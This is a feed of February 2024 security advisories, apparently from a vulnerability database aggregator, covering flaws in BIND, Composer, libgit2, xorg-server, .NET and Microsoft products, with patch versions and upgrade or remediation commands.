09.02.2024 09:16:00alpinelinux[ALPINE:CVE-2024-0229] xorg-server, xwayland vulnerability[From CVE-2024-0229] An out-of-bounds memory access flaw was found in the X.Org server. This issue can be triggered when a device frozen by a sync grab is reattached to a different master device. This issue may lead to an application crash, local privilege escalation (if the server runs with extended privileges), or remote code execution in SSH X11 forwarding environments.https://secdb.nttzen.cloud/security-advisory/alpinelinux/ALPINE:CVE-2024-0229
09.02.2024 02:15:08alpinelinux[ALPINE:CVE-2024-24821] composer vulnerability[From CVE-2024-24821] Composer is a dependency Manager for the PHP language. In affected versions several files within the local working directory are included during the invocation of Composer and in the context of the executing user. As such, under certain conditions arbitrary code execution may lead to local privilege escalation, provide lateral user movement or malicious code execution when Composer is invoked within a directory with tampered files. All Composer CLI commands are affected, including composer.phar's self-update. The following scenarios are of high risk: Composer being run with sudo, Pipelines which may execute Composer on untrusted projects, Shared environments with developers who run Composer individually on the same project. This vulnerability has been addressed in versions 2.7.0 and 2.2.23. It is advised that the patched versions are applied at the earliest convenience. Where not possible, the following should be addressed: Remove all sudo composer privileges for all users to mitigate root privilege escalation, and avoid running Composer within an untrusted directory, or if needed, verify that the contents of `vendor/composer/InstalledVersions.php` and `vendor/composer/installed.php` do not include untrusted code. A reset can also be done on these files by the following:
```sh
rm vendor/composer/installed.php vendor/composer/InstalledVersions.php
composer install --no-scripts --no-plugins
```
https://secdb.nttzen.cloud/security-advisory/alpinelinux/ALPINE:CVE-2024-24821
09.02.2024 02:00:00cisa[CISA-2024:0209] CISA Adds One Known Exploited Vulnerability to CatalogCISA has added one new vulnerability to its Known Exploited Vulnerabilities Catalog, based on evidence of active exploitation. These types of vulnerabilities are a frequent attack vector for malicious cyber actors and pose significant risk to the federal enterprise.https://secdb.nttzen.cloud/security-advisory/cisa/CISA-2024:0209
09.02.2024 02:00:00debian[DSA-5619-1] libgit2 security updatehttps://secdb.nttzen.cloud/security-advisory/debian/DSA-5619-1
09.02.2024 02:00:00redhat[RHSA-2024:0753] linux-firmware security update (moderate)The linux-firmware packages contain all of the firmware files that are required by various devices to operate. Security Fix(es): * (CVE-2023-20592) For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.https://secdb.nttzen.cloud/security-advisory/redhat/RHSA-2024:0753
09.02.2024 02:00:00gentoo[GLSA-202402-11] libxml2: Multiple Vulnerabilities (normal)Multiple denial of service vulnerabilities have been found in libxml2.https://secdb.nttzen.cloud/security-advisory/gentoo/GLSA-202402-11
09.02.2024 02:00:00oraclelinux[ELSA-2024-12149] kernel security update (important)[5.14.0-362.18.0.2] - net/sched: sch_hfsc: Ensure inner classes have fsc curve {CVE-2023-4623} - net/sched: sch_hfsc: upgrade 'rt' to 'sc' when it becomes a inner curve {CVE-2023-4623} - dpll: core: Add DPLL framework base functions {CVE-2023-6679} - dpll: spec: Add Netlink spec in YAML {CVE-2023-6679} - dpll: netlink: Add DPLL framework base functions {CVE-2023-6679} - netdev: expose DPLL pin handle for netdevice {CVE-2023-6679} - netdev: Remove unneeded semicolon {CVE-2023-6679} - dpll: netlink/core: add support for pin-dpll signal phase offset/adjust {CVE-2023-6679} - dpll: netlink/core: change pin frequency set behavior {CVE-2023-6679} - dpll: Fix potential msg memleak when genlmsg_put_reply failed {CVE-2023-6679} - dpll: sanitize possible null pointer dereference in dpll_pin_parent_pin_set() {CVE-2023-6679}https://secdb.nttzen.cloud/security-advisory/oraclelinux/ELSA-2024-12149
09.02.2024 17:12:07npm[NPM:GHSA-78XJ-CGH5-2H22] NPM IP package vulnerable to Server-Side Request Forgery (SSRF) attacks (high)An issue in NPM IP Package v.1.1.8 and before allows an attacker to execute arbitrary code and obtain sensitive information via the `isPublic()` function. This can lead to potential Server-Side Request Forgery (SSRF) attacks. The core issue is the function's failure to accurately distinguish between public and private IP addresses.https://secdb.nttzen.cloud/security-advisory/npm/NPM:GHSA-78XJ-CGH5-2H22
09.02.2024 17:40:03android[ASB-A-230492947] Start foreground activity from background in ActivityTaskManagerService#startNextMatchingActivity (high)In startNextMatchingActivity of ActivityTaskManagerService.java, there is a possible way to bypass the restrictions on starting activities from the background due to a logic error in the code. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.https://secdb.nttzen.cloud/security-advisory/android/ASB-A-230492947
10.02.2024 17:57:43rustsec[RUSTSEC-2024-0010] Improper comparison of different-length signaturesThe `Webhook::verify` function incorrectly compared signatures of different lengths - the two signatures would only be compared up to the length of the shorter signature. This allowed an attacker to pass in `v1,` as the signature, which would always pass verification.https://secdb.nttzen.cloud/security-advisory/rustsec/RUSTSEC-2024-0010
10.02.2024 04:46:05rustsec[RUSTSEC-2024-0013] Memory corruption, denial of service, and arbitrary code execution in libgit2The [libgit2](https://github.com/libgit2/libgit2/) project fixed three security issues in the 1.7.2 release. These issues are: * The `git_revparse_single` function can potentially enter an infinite loop on a well-crafted input, potentially causing a Denial of Service. This function is exposed in the `git2` crate via the [`Repository::revparse_single`](https://docs.rs/git2/latest/git2/struct.Repository.html#method.revparse_single) method. * The `git_index_add` function may cause heap corruption and possibly lead to arbitrary code execution. This function is exposed in the `git2` crate via the [`Index::add`](https://docs.rs/git2/latest/git2/struct.Index.html#method.add) method. * The smart transport negotiation may experience an out-of-bounds read when a remote server did not advertise capabilities. The `libgit2-sys` crate bundles libgit2, or optionally links to a system libgit2 library. In either case, versions of the libgit2 library less than 1.7.2 are vulnerable. The 0.16.2 release of `libgit2-sys` bundles the fixed version of 1.7.2, and requires a system libgit2 version of at least 1.7.2. It is recommended that all users upgrade.https://secdb.nttzen.cloud/security-advisory/rustsec/RUSTSEC-2024-0013
14.02.2024 06:22:19slackware[SSA:2024-044-02] dnsmasqNew dnsmasq packages are available for Slackware 15.0 and -current to fix security issues. **Here are the details from the Slackware 15.0 ChangeLog** ```patches/packages/dnsmasq-2.90-i586-1_slack15.0.txz: Upgraded. Add limits on the resources used to do DNSSEC validation. For more information, see: https://www.cve.org/CVERecord?id=CVE-2023-50387 https://www.cve.org/CVERecord?id=CVE-2023-50868 (* Security fix *)``` **Where to find the new packages** Thanks to the friendly folks at the OSU Open Source Lab (http://osuosl.org) for donating FTP and rsync hosting to the Slackware project! :-) Also see the "Get Slack" section on http://slackware.com for additional mirror sites near you. Updated package for Slackware 15.0: ftp://ftp.slackware.com/pub/slackware/slackware-15.0/patches/packages/dnsmasq-2.90-i586-1_slack15.0.txz Updated package for Slackware x86_64 15.0: ftp://ftp.slackware.com/pub/slackware/slackware64-15.0/patches/packages/dnsmasq-2.90-x86_64-1_slack15.0.txz Updated package for Slackware -current: ftp://ftp.slackware.com/pub/slackware/slackware-current/slackware/n/dnsmasq-2.90-i586-1.txz Updated package for Slackware x86_64 -current: ftp://ftp.slackware.com/pub/slackware/slackware64-current/slackware64/n/dnsmasq-2.90-x86_64-1.txz **MD5 signatures** Slackware 15.0 package: 5c3dee26922dd2a3f58d1e5c70f9f284 dnsmasq-2.90-i586-1_slack15.0.txz Slackware x86_64 15.0 package: 35f4d14b31baf2de9e3910f0f052f25d dnsmasq-2.90-x86_64-1_slack15.0.txz Slackware -current package: 1210b07b47998ab00dcf6cc7e3c9dd30 n/dnsmasq-2.90-i586-1.txz Slackware x86_64 -current package: 9862a73b6a5462656da236cd0ec4f9c2 n/dnsmasq-2.90-x86_64-1.txz **Installation instructions** Upgrade the package as root: `# upgradepkg dnsmasq-2.90-i586-1_slack15.0.txz` Then restart dnsmasq if you are using it: `# sh /etc/rc.d/rc.dnsmasq restart` https://secdb.nttzen.cloud/security-advisory/slackware/SSA:2024-044-02
13.02.2024 21:35:21slackware[SSA:2024-044-01] bindNew bind packages are available for Slackware 15.0 and -current to fix security issues. **Here are the details from the Slackware 15.0 ChangeLog** ```patches/packages/bind-9.16.48-i586-1_slack15.0.txz: Upgraded. This update fixes bugs and security issues: Specific DNS answers could cause a denial-of-service condition due to DNS validation taking a long time. Query patterns that continuously triggered cache database maintenance could exhaust all available memory on the host running named. Restore DNS64 state when handling a serve-stale timeout. Specific queries could trigger an assertion check with nxdomain-redirect enabled. Speed up parsing of DNS messages with many different names. For more information, see: https://kb.isc.org/docs/cve-2023-50387 https://www.cve.org/CVERecord?id=CVE-2023-50387 https://kb.isc.org/docs/cve-2023-6516 https://www.cve.org/CVERecord?id=CVE-2023-6516 https://kb.isc.org/docs/cve-2023-5679 https://www.cve.org/CVERecord?id=CVE-2023-5679 https://kb.isc.org/docs/cve-2023-5517 https://www.cve.org/CVERecord?id=CVE-2023-5517 https://kb.isc.org/docs/cve-2023-4408 https://www.cve.org/CVERecord?id=CVE-2023-4408 (* Security fix *)``` **Where to find the new packages** Thanks to the friendly folks at the OSU Open Source Lab (http://osuosl.org) for donating FTP and rsync hosting to the Slackware project! :-) Also see the "Get Slack" section on http://slackware.com for additional mirror sites near you. Updated package for Slackware 15.0: ftp://ftp.slackware.com/pub/slackware/slackware-15.0/patches/packages/bind-9.16.48-i586-1_slack15.0.txz Updated package for Slackware x86_64 15.0: ftp://ftp.slackware.com/pub/slackware/slackware64-15.0/patches/packages/bind-9.16.48-x86_64-1_slack15.0.txz Updated package for Slackware -current: ftp://ftp.slackware.com/pub/slackware/slackware-current/slackware/n/bind-9.18.24-i586-1.txz Updated package for Slackware x86_64 -current: ftp://ftp.slackware.com/pub/slackware/slackware64-current/slackware64/n/bind-9.18.24-x86_64-1.txz **MD5 signatures** Slackware 15.0 package: 688d05942acae07ca040a07057f107af bind-9.16.48-i586-1_slack15.0.txz Slackware x86_64 15.0 package: 72ec1aa452c6b37046e74b90797be3e8 bind-9.16.48-x86_64-1_slack15.0.txz Slackware -current package: 8e3c11dba6a01af76aa89531c2e2d62a n/bind-9.18.24-i586-1.txz Slackware x86_64 -current package: 8a9d10f4a4f1501ffc7f087dec4e281e n/bind-9.18.24-x86_64-1.txz **Installation instructions** Upgrade the package as root: `# upgradepkg bind-9.16.48-i586-1_slack15.0.txz` Then, restart the name server: `# /etc/rc.d/rc.bind restart` https://secdb.nttzen.cloud/security-advisory/slackware/SSA:2024-044-01
13.02.2024 16:15:46alpinelinux[ALPINE:CVE-2023-6516] bind vulnerability[From CVE-2023-6516] To keep its cache database efficient, `named` running as a recursive resolver occasionally attempts to clean up the database. It uses several methods, including some that are asynchronous: a small chunk of memory pointing to the cache element that can be cleaned up is first allocated and then queued for later processing. It was discovered that if the resolver is continuously processing query patterns triggering this type of cache-database maintenance, `named` may not be able to handle the cleanup events in a timely manner. This in turn enables the list of queued cleanup events to grow infinitely large over time, allowing the configured `max-cache-size` limit to be significantly exceeded. This issue affects BIND 9 versions 9.16.0 through 9.16.45 and 9.16.8-S1 through 9.16.45-S1.https://secdb.nttzen.cloud/security-advisory/alpinelinux/ALPINE:CVE-2023-6516
13.02.2024 16:15:45alpinelinux[ALPINE:CVE-2023-4408] bind vulnerability[From CVE-2023-4408] The DNS message parsing code in `named` includes a section whose computational complexity is overly high. It does not cause problems for typical DNS traffic, but crafted queries and responses may cause excessive CPU load on the affected `named` instance by exploiting this flaw. This issue affects both authoritative servers and recursive resolvers. This issue affects BIND 9 versions 9.0.0 through 9.16.45, 9.18.0 through 9.18.21, 9.19.0 through 9.19.19, 9.9.3-S1 through 9.11.37-S1, 9.16.8-S1 through 9.16.45-S1, and 9.18.11-S1 through 9.18.21-S1.https://secdb.nttzen.cloud/security-advisory/alpinelinux/ALPINE:CVE-2023-4408
13.02.2024 16:15:45alpinelinux[ALPINE:CVE-2023-5517] bind vulnerability[From CVE-2023-5517] A flaw in query-handling code can cause `named` to exit prematurely with an assertion failure when: - `nxdomain-redirect <domain>;` is configured, and - the resolver receives a PTR query for an RFC 1918 address that would normally result in an authoritative NXDOMAIN response. This issue affects BIND 9 versions 9.12.0 through 9.16.45, 9.18.0 through 9.18.21, 9.19.0 through 9.19.19, 9.16.8-S1 through 9.16.45-S1, and 9.18.11-S1 through 9.18.21-S1.https://secdb.nttzen.cloud/security-advisory/alpinelinux/ALPINE:CVE-2023-5517
13.02.2024 16:15:45alpinelinux[ALPINE:CVE-2023-5679] bind vulnerability[From CVE-2023-5679] A bad interaction between DNS64 and serve-stale may cause `named` to crash with an assertion failure during recursive resolution, when both of these features are enabled. This issue affects BIND 9 versions 9.16.12 through 9.16.45, 9.18.0 through 9.18.21, 9.19.0 through 9.19.19, 9.16.12-S1 through 9.16.45-S1, and 9.18.11-S1 through 9.18.21-S1.https://secdb.nttzen.cloud/security-advisory/alpinelinux/ALPINE:CVE-2023-5679
13.02.2024 16:15:45alpinelinux[ALPINE:CVE-2023-5680] bind vulnerability[From CVE-2023-5680] If a resolver cache has a very large number of ECS records stored for the same name, the process of cleaning the cache database node for this name can significantly impair query performance. This issue affects BIND 9 versions 9.11.3-S1 through 9.11.37-S1, 9.16.8-S1 through 9.16.45-S1, and 9.18.11-S1 through 9.18.21-S1.https://secdb.nttzen.cloud/security-advisory/alpinelinux/ALPINE:CVE-2023-5680
13.02.2024 10:00:00 | msrc | [MS:CVE-2024-20667] Azure DevOps Server Remote Code Execution Vulnerability (important) | https://secdb.nttzen.cloud/security-advisory/msrc/MS:CVE-2024-20667
13.02.2024 10:00:00 | msrc | [MS:CVE-2023-50387] MITRE: CVE-2023-50387 DNSSEC verification complexity can be exploited to exhaust CPU resources and stall DNS resolvers (important) | https://secdb.nttzen.cloud/security-advisory/msrc/MS:CVE-2023-50387
13.02.2024 10:00:00 | msrc | [MS:CVE-2024-21327] Microsoft Dynamics 365 Customer Engagement Cross-Site Scripting Vulnerability (important) | https://secdb.nttzen.cloud/security-advisory/msrc/MS:CVE-2024-21327
13.02.2024 10:00:00 | msrc | [MS:CVE-2024-21329] Azure Connected Machine Agent Elevation of Privilege Vulnerability (important) | https://secdb.nttzen.cloud/security-advisory/msrc/MS:CVE-2024-21329
13.02.2024 10:00:00 | msrc | [MS:CVE-2024-21338] Windows Kernel Elevation of Privilege Vulnerability (important) | https://secdb.nttzen.cloud/security-advisory/msrc/MS:CVE-2024-21338
13.02.2024 10:00:00 | msrc | [MS:CVE-2024-21340] Windows Kernel Information Disclosure Vulnerability (important) | https://secdb.nttzen.cloud/security-advisory/msrc/MS:CVE-2024-21340
13.02.2024 10:00:00 | msrc | [MS:CVE-2024-21349] Microsoft ActiveX Data Objects Remote Code Execution Vulnerability (important) | https://secdb.nttzen.cloud/security-advisory/msrc/MS:CVE-2024-21349
13.02.2024 10:00:00 | msrc | [MS:CVE-2024-21350] Microsoft WDAC OLE DB provider for SQL Server Remote Code Execution Vulnerability (important) | https://secdb.nttzen.cloud/security-advisory/msrc/MS:CVE-2024-21350
13.02.2024 10:00:00 | msrc | [MS:CVE-2024-21351] Windows SmartScreen Security Feature Bypass Vulnerability (moderate) | https://secdb.nttzen.cloud/security-advisory/msrc/MS:CVE-2024-21351
13.02.2024 10:00:00 | msrc | [MS:CVE-2024-21352] Microsoft WDAC OLE DB provider for SQL Server Remote Code Execution Vulnerability (important) | https://secdb.nttzen.cloud/security-advisory/msrc/MS:CVE-2024-21352
13.02.2024 10:00:00 | msrc | [MS:CVE-2024-21354] Microsoft Message Queuing (MSMQ) Elevation of Privilege Vulnerability (important) | https://secdb.nttzen.cloud/security-advisory/msrc/MS:CVE-2024-21354
13.02.2024 10:00:00 | msrc | [MS:CVE-2024-21357] Windows Pragmatic General Multicast (PGM) Remote Code Execution Vulnerability (critical) | https://secdb.nttzen.cloud/security-advisory/msrc/MS:CVE-2024-21357
13.02.2024 10:00:00 | msrc | [MS:CVE-2024-21358] Microsoft WDAC OLE DB provider for SQL Server Remote Code Execution Vulnerability (important) | https://secdb.nttzen.cloud/security-advisory/msrc/MS:CVE-2024-21358
13.02.2024 10:00:00 | msrc | [MS:CVE-2024-21360] Microsoft WDAC OLE DB provider for SQL Server Remote Code Execution Vulnerability (important) | https://secdb.nttzen.cloud/security-advisory/msrc/MS:CVE-2024-21360
13.02.2024 10:00:00 | msrc | [MS:CVE-2024-21361] Microsoft WDAC OLE DB provider for SQL Server Remote Code Execution Vulnerability (important) | https://secdb.nttzen.cloud/security-advisory/msrc/MS:CVE-2024-21361
13.02.2024 10:00:00 | msrc | [MS:CVE-2024-21366] Microsoft WDAC OLE DB provider for SQL Server Remote Code Execution Vulnerability (important) | https://secdb.nttzen.cloud/security-advisory/msrc/MS:CVE-2024-21366
13.02.2024 10:00:00 | msrc | [MS:CVE-2024-21369] Microsoft WDAC OLE DB provider for SQL Server Remote Code Execution Vulnerability (important) | https://secdb.nttzen.cloud/security-advisory/msrc/MS:CVE-2024-21369
13.02.2024 10:00:00 | msrc | [MS:CVE-2024-21371] Windows Kernel Elevation of Privilege Vulnerability (important) | https://secdb.nttzen.cloud/security-advisory/msrc/MS:CVE-2024-21371
13.02.2024 10:00:00 | msrc | [MS:CVE-2024-21372] Windows OLE Remote Code Execution Vulnerability (important) | https://secdb.nttzen.cloud/security-advisory/msrc/MS:CVE-2024-21372
13.02.2024 10:00:00 | msrc | [MS:CVE-2024-21375] Microsoft WDAC OLE DB provider for SQL Server Remote Code Execution Vulnerability (important) | https://secdb.nttzen.cloud/security-advisory/msrc/MS:CVE-2024-21375
13.02.2024 10:00:00 | msrc | [MS:CVE-2024-21379] Microsoft Word Remote Code Execution Vulnerability (important) | https://secdb.nttzen.cloud/security-advisory/msrc/MS:CVE-2024-21379
13.02.2024 10:00:00 | msrc | [MS:CVE-2024-21381] Microsoft Azure Active Directory B2C Spoofing Vulnerability (important) | https://secdb.nttzen.cloud/security-advisory/msrc/MS:CVE-2024-21381
13.02.2024 10:00:00 | msrc | [MS:CVE-2024-21386] .NET Denial of Service Vulnerability (important) | https://secdb.nttzen.cloud/security-advisory/msrc/MS:CVE-2024-21386
13.02.2024 10:00:00 | msrc | [MS:CVE-2024-21389] Microsoft Dynamics 365 (on-premises) Cross-site Scripting Vulnerability (important) | https://secdb.nttzen.cloud/security-advisory/msrc/MS:CVE-2024-21389
13.02.2024 10:00:00 | msrc | [MS:CVE-2024-21393] Microsoft Dynamics 365 (on-premises) Cross-site Scripting Vulnerability (important) | https://secdb.nttzen.cloud/security-advisory/msrc/MS:CVE-2024-21393
13.02.2024 10:00:00 | msrc | [MS:CVE-2024-21394] Dynamics 365 Field Service Spoofing Vulnerability (important) | https://secdb.nttzen.cloud/security-advisory/msrc/MS:CVE-2024-21394
13.02.2024 10:00:00 | msrc | [MS:CVE-2024-21396] Dynamics 365 Sales Spoofing Vulnerability (important) | https://secdb.nttzen.cloud/security-advisory/msrc/MS:CVE-2024-21396
13.02.2024 10:00:00 | msrc | [MS:CVE-2024-21401] Microsoft Entra Jira Single-Sign-On Plugin Elevation of Privilege Vulnerability (important) | https://secdb.nttzen.cloud/security-advisory/msrc/MS:CVE-2024-21401
13.02.2024 10:00:00 | msrc | [MS:CVE-2024-21402] Microsoft Outlook Elevation of Privilege Vulnerability (important) | https://secdb.nttzen.cloud/security-advisory/msrc/MS:CVE-2024-21402
13.02.2024 10:00:00 | msrc | [MS:CVE-2024-21404] .NET Denial of Service Vulnerability (important) | https://secdb.nttzen.cloud/security-advisory/msrc/MS:CVE-2024-21404
13.02.2024 10:00:00 | msrc | [MS:CVE-2024-21413] Microsoft Outlook Remote Code Execution Vulnerability (critical) | https://secdb.nttzen.cloud/security-advisory/msrc/MS:CVE-2024-21413
13.02.2024 10:00:00 | msrc | [MS:CVE-2024-21420] Microsoft WDAC OLE DB provider for SQL Server Remote Code Execution Vulnerability (important) | https://secdb.nttzen.cloud/security-advisory/msrc/MS:CVE-2024-21420
13.02.2024 10:00:00 | msrc | [MS:CVE-2024-20673] Microsoft Office Remote Code Execution Vulnerability (important) | https://secdb.nttzen.cloud/security-advisory/msrc/MS:CVE-2024-20673
13.02.2024 10:00:00 | msrc | [MS:CVE-2024-20679] Azure Stack Hub Spoofing Vulnerability (important) | https://secdb.nttzen.cloud/security-advisory/msrc/MS:CVE-2024-20679
13.02.2024 10:00:00 | msrc | [MS:CVE-2024-21304] Trusted Compute Base Elevation of Privilege Vulnerability (important) | https://secdb.nttzen.cloud/security-advisory/msrc/MS:CVE-2024-21304
13.02.2024 10:00:00 | msrc | [MS:CVE-2024-21315] Microsoft Defender for Endpoint Protection Elevation of Privilege Vulnerability (important) | https://secdb.nttzen.cloud/security-advisory/msrc/MS:CVE-2024-21315
13.02.2024 10:00:00 | msrc | [MS:CVE-2024-20695] Skype for Business Information Disclosure Vulnerability (important) | https://secdb.nttzen.cloud/security-advisory/msrc/MS:CVE-2024-20695
13.02.2024 10:00:00 | msrc | [MS:CVE-2024-21328] Dynamics 365 Sales Spoofing Vulnerability (important) | https://secdb.nttzen.cloud/security-advisory/msrc/MS:CVE-2024-21328
13.02.2024 10:00:00 | msrc | [MS:CVE-2024-20684] Windows Hyper-V Denial of Service Vulnerability (critical) | https://secdb.nttzen.cloud/security-advisory/msrc/MS:CVE-2024-20684
13.02.2024 10:00:00 | msrc | [MS:CVE-2024-21339] Windows USB Generic Parent Driver Remote Code Execution Vulnerability (important) | https://secdb.nttzen.cloud/security-advisory/msrc/MS:CVE-2024-21339
13.02.2024 10:00:00 | msrc | [MS:CVE-2024-21341] Windows Kernel Remote Code Execution Vulnerability (important) | https://secdb.nttzen.cloud/security-advisory/msrc/MS:CVE-2024-21341
13.02.2024 10:00:00 | msrc | [MS:CVE-2024-21342] Windows DNS Client Denial of Service Vulnerability (important) | https://secdb.nttzen.cloud/security-advisory/msrc/MS:CVE-2024-21342
13.02.2024 10:00:00 | msrc | [MS:CVE-2024-21343] Windows Network Address Translation (NAT) Denial of Service Vulnerability (important) | https://secdb.nttzen.cloud/security-advisory/msrc/MS:CVE-2024-21343
13.02.2024 10:00:00 | msrc | [MS:CVE-2024-21344] Windows Network Address Translation (NAT) Denial of Service Vulnerability (important) | https://secdb.nttzen.cloud/security-advisory/msrc/MS:CVE-2024-21344
13.02.2024 10:00:00 | msrc | [MS:CVE-2024-21345] Windows Kernel Elevation of Privilege Vulnerability (important) | https://secdb.nttzen.cloud/security-advisory/msrc/MS:CVE-2024-21345
13.02.2024 10:00:00 | msrc | [MS:CVE-2024-21346] Win32k Elevation of Privilege Vulnerability (important) | https://secdb.nttzen.cloud/security-advisory/msrc/MS:CVE-2024-21346
13.02.2024 10:00:00 | msrc | [MS:CVE-2024-21347] Microsoft ODBC Driver Remote Code Execution Vulnerability (important) | https://secdb.nttzen.cloud/security-advisory/msrc/MS:CVE-2024-21347
13.02.2024 10:00:00 | msrc | [MS:CVE-2024-21348] Internet Connection Sharing (ICS) Denial of Service Vulnerability (important) | https://secdb.nttzen.cloud/security-advisory/msrc/MS:CVE-2024-21348
13.02.2024 10:00:00 | msrc | [MS:CVE-2024-21353] Microsoft WDAC ODBC Driver Remote Code Execution Vulnerability (important) | https://secdb.nttzen.cloud/security-advisory/msrc/MS:CVE-2024-21353
13.02.2024 10:00:00 | msrc | [MS:CVE-2024-21355] Microsoft Message Queuing (MSMQ) Elevation of Privilege Vulnerability (important) | https://secdb.nttzen.cloud/security-advisory/msrc/MS:CVE-2024-21355
13.02.2024 10:00:00 | msrc | [MS:CVE-2024-21356] Windows Lightweight Directory Access Protocol (LDAP) Denial of Service Vulnerability (important) | https://secdb.nttzen.cloud/security-advisory/msrc/MS:CVE-2024-21356
13.02.2024 10:00:00 | msrc | [MS:CVE-2024-21359] Microsoft WDAC OLE DB provider for SQL Server Remote Code Execution Vulnerability (important) | https://secdb.nttzen.cloud/security-advisory/msrc/MS:CVE-2024-21359
13.02.2024 10:00:00 | msrc | [MS:CVE-2024-21362] Windows Kernel Security Feature Bypass Vulnerability (important) | https://secdb.nttzen.cloud/security-advisory/msrc/MS:CVE-2024-21362
13.02.2024 10:00:00 | msrc | [MS:CVE-2024-21363] Microsoft Message Queuing (MSMQ) Remote Code Execution Vulnerability (important) | https://secdb.nttzen.cloud/security-advisory/msrc/MS:CVE-2024-21363
13.02.2024 10:00:00 | msrc | [MS:CVE-2024-21364] Microsoft Azure Site Recovery Elevation of Privilege Vulnerability (moderate) | https://secdb.nttzen.cloud/security-advisory/msrc/MS:CVE-2024-21364
13.02.2024 10:00:00 | msrc | [MS:CVE-2024-21365] Microsoft WDAC OLE DB provider for SQL Server Remote Code Execution Vulnerability (important) | https://secdb.nttzen.cloud/security-advisory/msrc/MS:CVE-2024-21365
13.02.2024 10:00:00 | msrc | [MS:CVE-2024-21367] Microsoft WDAC OLE DB provider for SQL Server Remote Code Execution Vulnerability (important) | https://secdb.nttzen.cloud/security-advisory/msrc/MS:CVE-2024-21367
13.02.2024 10:00:00 | msrc | [MS:CVE-2024-21368] Microsoft WDAC OLE DB provider for SQL Server Remote Code Execution Vulnerability (important) | https://secdb.nttzen.cloud/security-advisory/msrc/MS:CVE-2024-21368
13.02.2024 10:00:00 | msrc | [MS:CVE-2024-21370] Microsoft WDAC OLE DB provider for SQL Server Remote Code Execution Vulnerability (important) | https://secdb.nttzen.cloud/security-advisory/msrc/MS:CVE-2024-21370
13.02.2024 10:00:00 | msrc | [MS:CVE-2024-21374] Microsoft Teams for Android Information Disclosure (important) | https://secdb.nttzen.cloud/security-advisory/msrc/MS:CVE-2024-21374
13.02.2024 10:00:00 | msrc | [MS:CVE-2024-21376] Microsoft Azure Kubernetes Service Confidential Container Remote Code Execution Vulnerability (important) | https://secdb.nttzen.cloud/security-advisory/msrc/MS:CVE-2024-21376
13.02.2024 10:00:00 | msrc | [MS:CVE-2024-21377] Windows DNS Information Disclosure Vulnerability (important) | https://secdb.nttzen.cloud/security-advisory/msrc/MS:CVE-2024-21377
13.02.2024 10:00:00 | msrc | [MS:CVE-2024-21378] Microsoft Outlook Remote Code Execution Vulnerability (important) | https://secdb.nttzen.cloud/security-advisory/msrc/MS:CVE-2024-21378
13.02.2024 10:00:00 | msrc | [MS:CVE-2024-21380] Microsoft Dynamics Business Central/NAV Information Disclosure Vulnerability (critical) | https://secdb.nttzen.cloud/security-advisory/msrc/MS:CVE-2024-21380
13.02.2024 10:00:00 | msrc | [MS:CVE-2024-21384] Microsoft Office OneNote Remote Code Execution Vulnerability (important) | https://secdb.nttzen.cloud/security-advisory/msrc/MS:CVE-2024-21384
13.02.2024 10:00:00 | msrc | [MS:CVE-2024-21391] Microsoft WDAC OLE DB provider for SQL Server Remote Code Execution Vulnerability (important) | https://secdb.nttzen.cloud/security-advisory/msrc/MS:CVE-2024-21391
13.02.2024 10:00:00 | msrc | [MS:CVE-2024-21395] Microsoft Dynamics 365 (on-premises) Cross-site Scripting Vulnerability (important) | https://secdb.nttzen.cloud/security-advisory/msrc/MS:CVE-2024-21395
13.02.2024 10:00:00 | msrc | [MS:CVE-2024-21397] Microsoft Azure File Sync Elevation of Privilege Vulnerability (important) | https://secdb.nttzen.cloud/security-advisory/msrc/MS:CVE-2024-21397
13.02.2024 10:00:00 | msrc | [MS:CVE-2024-21403] Microsoft Azure Kubernetes Service Confidential Container Elevation of Privilege Vulnerability (important) | https://secdb.nttzen.cloud/security-advisory/msrc/MS:CVE-2024-21403
13.02.2024 10:00:00 | msrc | [MS:CVE-2024-21405] Microsoft Message Queuing (MSMQ) Elevation of Privilege Vulnerability (important) | https://secdb.nttzen.cloud/security-advisory/msrc/MS:CVE-2024-21405
13.02.2024 10:00:00 | msrc | [MS:CVE-2024-21406] Windows Printing Service Spoofing Vulnerability (important) | https://secdb.nttzen.cloud/security-advisory/msrc/MS:CVE-2024-21406
13.02.2024 10:00:00 | msrc | [MS:CVE-2024-21410] Microsoft Exchange Server Elevation of Privilege Vulnerability (critical) | https://secdb.nttzen.cloud/security-advisory/msrc/MS:CVE-2024-21410
13.02.2024 10:00:00 | msrc | [MS:CVE-2024-21412] Internet Shortcut Files Security Feature Bypass Vulnerability (important) | https://secdb.nttzen.cloud/security-advisory/msrc/MS:CVE-2024-21412
13.02.2024 02:00:00 | cisa | [CISA-2024:0213] CISA Adds 2 Known Exploited Vulnerabilities to Catalog | CISA has added 2 new vulnerabilities to its Known Exploited Vulnerabilities Catalog, based on evidence of active exploitation. These types of vulnerabilities are a frequent attack vector for malicious cyber actors and pose significant risk to the federal enterprise. | https://secdb.nttzen.cloud/security-advisory/cisa/CISA-2024:0213
13.02.2024 02:00:00 | redhat | [RHSA-2024:0806] dotnet7.0 security update (important)
.NET is a managed-software framework. It implements a subset of the .NET framework APIs and several new APIs, and it includes a CLR implementation.
New versions of .NET that address a security vulnerability are now available. The updated versions are .NET SDK 7.0.116 and .NET Runtime 7.0.16.
Security Fix(es):
* dotnet: Denial of Service in SignalR server (CVE-2024-21386)
* dotnet: Denial of Service in X509Certificate2 (CVE-2024-21404)
For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.
https://secdb.nttzen.cloud/security-advisory/redhat/RHSA-2024:0806
13.02.2024 02:00:00 | redhat | [RHSA-2024:0808] dotnet6.0 security update (important)
.NET is a managed-software framework. It implements a subset of the .NET framework APIs and several new APIs, and it includes a CLR implementation.
New versions of .NET that address a security vulnerability are now available. The updated versions are .NET SDK 6.0.127 and .NET Runtime 6.0.27.
Security Fix(es):
* dotnet: Denial of Service in SignalR server (CVE-2024-21386)
* dotnet: Denial of Service in X509Certificate2 (CVE-2024-21404)
For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.
https://secdb.nttzen.cloud/security-advisory/redhat/RHSA-2024:0808
13.02.2024 02:00:00 | redhat | [RHSA-2024:0805] dotnet7.0 security update (important)
.NET is a managed-software framework. It implements a subset of the .NET framework APIs and several new APIs, and it includes a CLR implementation.
New versions of .NET that address a security vulnerability are now available. The updated versions are .NET SDK 7.0.116 and .NET Runtime 7.0.16.
Security Fix(es):
* dotnet: Denial of Service in SignalR server (CVE-2024-21386)
